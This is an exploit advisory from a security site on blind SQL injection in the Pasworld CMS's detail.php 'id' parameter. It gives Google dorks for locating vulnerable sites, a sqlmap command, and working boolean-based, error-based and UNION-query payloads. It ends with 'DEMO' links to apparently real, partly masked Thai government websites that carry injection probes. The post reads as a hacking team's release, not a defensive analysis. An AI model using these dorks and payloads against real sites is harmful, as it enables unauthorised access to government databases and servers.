Pasworld detail.php Blind Sql Injection Vulnerability

2015.06.05
Credit: Shelesh Rauthan
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: site:go.th inurl:\"detail.php?id=\"

========================================================= [+] Title :- Pasworld detail.php Blind Sql Injection Vulnerability [+] Date :- 5 - June - 2015 [+] Vendor Homepage: :- http://main.pasworld.co.th/ [+] Version :- All Versions [+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows [+] Category :- webapps [+] Google Dorks :- intext:"Powered By :: PAS World Communitcation" inurl:detail.php site:go.th inurl:"detail.php?id=" [+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN) [+] Team name :- Team Alastor Breeze [+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R [+] Greedz to :- @@lu, Lalit, MyLappy<3, Diksha [+] Contact :- fb.com/shelesh.rauthan, indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com ========================================================= [+] Severity Level :- High [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- detail.php?id= [+] Affected Area(s) :- Entire admin, database, Server ========================================================= [+] About :- Unauthenticated SQL Injection via "detail.php?id=" parameter [+] SQL vulnerable File :- /home/DOMAIN/domains/DOMAIN.go.th/public_html/detail.php [+] POC :- http://127.0.0.1/detail.php?id=[SQL]' SQLMap ++++++++++++++++++++++++++ python sqlmap.py --url "http://127.0.0.1/detail.php?id=[SQL]" --dbs ++++++++++++++++++++++++++ Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=152 AND 1414=1414 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=152 AND (SELECT 1163 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (CASE WHEN (1163=1163) THEN 1 ELSE 0 END)),0x7162707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (random number) - 9 columns Payload: id=-7470 UNION ALL SELECT 5982,5982,5982,5982,5982,CONCAT(0x7162766271,0x4b437a4a565555674571,0x7162707671),5982,5982,5982# [+] DEMO :- http://www.nXeunsri.go.th/detail.php?id=16%27 http://www.satoXo.th/detail.php?id=39%27 http://www.namXb.go.th/detail.php?id=8%27 http://www.saopXjan.go.th/news/detail.php?id=1%27 http://www.wangXaichan.go.th/detail.php?id=11 http://www.suaXluay.go.th/detail.php?id=10%27 =========================================================


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top